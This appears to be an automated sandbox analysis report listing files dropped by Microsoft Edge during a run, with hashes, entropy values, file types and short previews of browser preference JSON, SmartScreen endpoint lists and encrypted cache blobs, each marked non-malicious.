                                                                                                                                                                                                                                                      SHA-256:3B4971807EFDA48369A920BF16B2FD811F185A753D011FF44C776C81239EA28A
                                                                                                                                                                                                                                                      SHA-512:28DFA4567A43BC8C56C286560F97489FA508CC87D9480B456C7D79F258608FA626114E6F4FCF5638A1640B3B6CAEFFA0A83079AC499C6313B531DC2D33CA50A2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):43978
                                                                                                                                                                                                                                                      Entropy (8bit):6.091536102124481
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kgzUXqgfb/ZtXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynVNt3FqfyW0e6kaoZ
                                                                                                                                                                                                                                                      MD5:88170FA30C2F622870C6EC4DAA34B0D7
                                                                                                                                                                                                                                                      SHA1:5740B63F2098275BEF4FF7691C4000B4074EB4CE
                                                                                                                                                                                                                                                      SHA-256:3B4971807EFDA48369A920BF16B2FD811F185A753D011FF44C776C81239EA28A
                                                                                                                                                                                                                                                      SHA-512:28DFA4567A43BC8C56C286560F97489FA508CC87D9480B456C7D79F258608FA626114E6F4FCF5638A1640B3B6CAEFFA0A83079AC499C6313B531DC2D33CA50A2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                      Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                      MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                      SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                      SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                      SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):47
                                                                                                                                                                                                                                                      Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                      MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                      SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                      SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                      SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):35
                                                                                                                                                                                                                                                      Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                      MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                      SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                      SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                      SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):81
                                                                                                                                                                                                                                                      Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                      MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                      SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                      SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                      SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):130439
                                                                                                                                                                                                                                                      Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                      MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                      SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                      SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                      SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                      Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                      MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                      SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                      SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                      SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):57
                                                                                                                                                                                                                                                      Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                      MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                      SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                      SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                      SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                                                                                                      Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                      MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                      SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                      SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                      SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):575056
                                                                                                                                                                                                                                                      Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                      MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                      SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                      SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                      SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):460992
                                                                                                                                                                                                                                                      Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                      MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                      SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                      SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                      SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):9
                                                                                                                                                                                                                                                      Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                      MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                      SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                      SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                      SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:uriCache_
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):179
                                                                                                                                                                                                                                                      Entropy (8bit):5.021873027086672
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclWA7SRTyn:YWLSGTt1o9LuLgfGBPAzkVj/T8lWen
                                                                                                                                                                                                                                                      MD5:E22541C91601A38B263DEABFDC53C04D
                                                                                                                                                                                                                                                      SHA1:74CA9C722A4EADB5E5E964311B70284B661BDB06
                                                                                                                                                                                                                                                      SHA-256:B5C1B2E4450DCD621BF40F31FB63B280AA4FC5CB5BD81FA01691C1F232897607
                                                                                                                                                                                                                                                      SHA-512:86E91CB77F2E2B3EE4396A4EA23680C6FBA2A1E124D1C3FE7239FDC4262F0374FCE4E71151FBC487A5A7D740924E2E30A63A28D3FE5C285A5012E833B7BD6CFF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1733103518779346}]}
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):86
                                                                                                                                                                                                                                                      Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                      MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                      SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                      SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                      SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                      Size (bytes):44445
                                                                                                                                                                                                                                                      Entropy (8bit):6.096468819298406
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4k9VUXqgfb/rV0sOPFYYFt7UQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynqK6qfyW0e6kaoZ
                                                                                                                                                                                                                                                      MD5:2BCE7E474014FF504172C29D04CFFBB3
                                                                                                                                                                                                                                                      SHA1:08F9973894A72AE933516EFD0E9282821CF62D43
                                                                                                                                                                                                                                                      SHA-256:D45FCEA35EC385CD3F8D6F277DC80AD58C33560175E63B9FE8595333563E3185
                                                                                                                                                                                                                                                      SHA-512:BFEAC9EA5E2E229EDE811CFF6D8F2E0AE2A7571CD12603E2A14734ACBC362D9B5C76BD8972BC884FBFFA8D0EFE102D0C31966990F9E1AA5BB45ACFCCBD89C076
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):44527
                                                                                                                                                                                                                                                      Entropy (8bit):6.096240221399155
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xGVUXqgfb/t1qP20jYEFRUQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7yOxEF6qfyW0e6kaoZ
                                                                                                                                                                                                                                                      MD5:ECD851A54A029F081301D48842EE5A0A
                                                                                                                                                                                                                                                      SHA1:F8F0827FAC1D6B9180624117C9813C5B4379F9A8
                                                                                                                                                                                                                                                      SHA-256:D05D65B69E3268E7C59D70BEFFA491F2C7C1FBD56619AC7FBC36B35A8B9CE189
                                                                                                                                                                                                                                                      SHA-512:2999ABD05F6F1E01BF17C02DFD6F67B7F78542CA6B405526F320FEF0E86BF69EA887F1C1AFE94B2C918DD224A38AD7D7F75F72F14FAE312B2B8AEE533FD0E892
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
